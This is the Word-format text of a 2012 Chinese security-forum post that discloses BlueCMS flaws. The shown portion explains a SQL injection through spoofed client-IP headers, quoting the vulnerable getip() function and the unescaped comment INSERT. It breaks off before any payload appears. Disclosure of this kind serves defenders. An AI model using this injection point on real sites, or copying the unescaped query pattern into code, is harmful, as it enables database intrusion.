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E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://forum.90sec.org/forumdisplay.php?fid=10&amp;filter=type&amp;typeid=2" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【原创】</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bluecms 0day </w:t>
      </w:r>
      <w:r w:rsidRPr="00E66B98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>大集合</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidTr="00E66B98">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:bookmarkEnd w:id="0"/>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:t>本帖最后由</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>西毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>于</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> 2012-8-27 00:01 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>编辑</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>既然论坛都整改了，把我所有所有的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>JB</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>都清空了。大家有</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>0day</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>都舍不得放出来，好吧，从我开始吧，把我挖的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>0day</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>都放出来了。希望大家有</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>0day</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>的都放出来。别藏着了，藏着</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>Mjj</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>了。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
              <w:t>Bluecms</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>也就是从一个公司教程看到的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>cms</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>，然后想了想，既然那里面拿来做教程，我就挖挖这套</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>cms</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>漏洞，我也没深挖到底，也没能坚持把代码看完。但是已经发现了很多很多的问题。其实能拿到</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>就可以了。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
              <w:t>author</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>西毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>来自</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>http://hi.baidu.com/sethc5/blog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20" name="图片 20" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="5248275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="19" name="图片 19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5374" descr="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524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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:tooltip="1.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (63.57 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:36</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:lastRenderedPageBreak/>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>采集俺的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>MJJ</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x01. </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
              <w:t>client_ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>伪造注入</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>看代码吧，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>这里的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>getip</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>函数是获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>Ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>的，由于，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>client_ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>x_forwarded_for</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>都可以伪造。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> include/common.fun.php </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>106</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>行</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:hyperlink r:id="rId9" w:anchor="viewSource" w:tooltip="预览源代码" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>预览源代码</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98"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8pt;height:18pt" o:ole="">
                  <v:imagedata r:id="rId10" o:title=""/>
                </v:shape>
                <w:control r:id="rId11" w:name="对象 3" w:shapeid="_x0000_i1027"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:hyperlink r:id="rId12" w:anchor="printSource" w:tooltip="打印" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>打印</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId13" w:anchor="about" w:tooltip="关于" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>关于</w:t>
              </w:r>
            </w:hyperlink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2068"/>
            </w:tblGrid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01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function getip()</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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02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{</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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3244"/>
            </w:tblGrid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03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if (getenv('HTTP_CLIENT_IP'))</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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04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{</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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3477"/>
            </w:tblGrid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05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 xml:space="preserve">$ip = getenv('HTTP_CLIENT_IP'); </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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06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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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4510"/>
            </w:tblGrid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07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/>
              </w:tc>
            </w:tr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08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 xml:space="preserve">elseif (getenv('HTTP_X_FORWARDED_FOR')) </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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5332"/>
            </w:tblGrid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09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{ //</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00E66B98">
                    <w:t>获取客户端用代理服务器访问时的真实</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00E66B98">
                    <w:t xml:space="preserve">ip </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00E66B98">
                    <w:t>地址</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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lastRenderedPageBreak/>
                    <w:t>10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$ip = getenv('HTTP_X_FORWARDED_FOR');</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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4057"/>
            </w:tblGrid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11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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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12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 xml:space="preserve">elseif (getenv('HTTP_X_FORWARDED')) </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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3951"/>
            </w:tblGrid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13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 xml:space="preserve">{ </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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14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$ip = getenv('HTTP_X_FORWARDED');</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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4296"/>
            </w:tblGrid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15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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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16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elseif (getenv('HTTP_FORWARDED_FOR'))</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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4189"/>
            </w:tblGrid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17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{</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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18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 xml:space="preserve">$ip = getenv('HTTP_FORWARDED_FOR'); </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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3844"/>
            </w:tblGrid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19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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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20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elseif (getenv('HTTP_FORWARDED'))</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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3737"/>
            </w:tblGrid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21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{</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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22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$ip = getenv('HTTP_FORWARDED');</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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1090"/>
            </w:tblGrid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23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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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24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else</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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3683"/>
            </w:tblGrid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lastRenderedPageBreak/>
                    <w:t>25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 xml:space="preserve">{ </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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26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$ip = $_SERVER['REMOTE_ADDR'];</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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1657"/>
            </w:tblGrid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27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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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28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return $ip;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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  <w:gridCol w:w="817"/>
            </w:tblGrid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29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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:t>我们继续跟踪一下</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>getip()</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>这个函数的应用。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
              <w:t>comment.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>行</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:hyperlink r:id="rId14" w:anchor="viewSource" w:tooltip="预览源代码" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>预览源代码</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:18pt;height:18pt" o:ole="">
                  <v:imagedata r:id="rId10" o:title=""/>
                </v:shape>
                <w:control r:id="rId15" w:name="对象 4" w:shapeid="_x0000_i1028"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:hyperlink r:id="rId16" w:anchor="printSource" w:tooltip="打印" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>打印</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId17" w:anchor="about" w:tooltip="关于" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>关于</w:t>
              </w:r>
            </w:hyperlink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"/>
              <w:gridCol w:w="8139"/>
            </w:tblGrid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1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 xml:space="preserve">$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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2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VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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"/>
              <w:gridCol w:w="2272"/>
            </w:tblGrid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3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/>
              </w:tc>
            </w:tr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4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$db-&gt;query($sql);</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:t>这里我们伪造下</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>测试下。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="18" name="图片 18" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5267325" cy="3152775"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="17" name="图片 17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5375" descr="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315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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:tooltip="2.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (36.17 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:38</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16" name="图片 16" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4048125" cy="1685925"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="15" name="图片 15" descr="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5376" descr="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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:tooltip="3.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (13.04 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:39</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>看看结果</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="14" name="图片 14" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="1104900"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="13" name="图片 13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5377" descr="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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:tooltip="4.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (27.98 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:40</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>可以看到了么？</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:lastRenderedPageBreak/>
              <w:t>已经是注入了</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>问题这里的是报错是。。它已经单独写出报错的语句，以致我们不能利用报错语句，直接爆出用户名和密码。但是我们可以用盲注的方式进行来搞用户名和密码了。但是这样子太麻烦了。之前，我一直在想啊，想啊，用啥方法来注呢，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>注，注。。。。。。。</w:t>
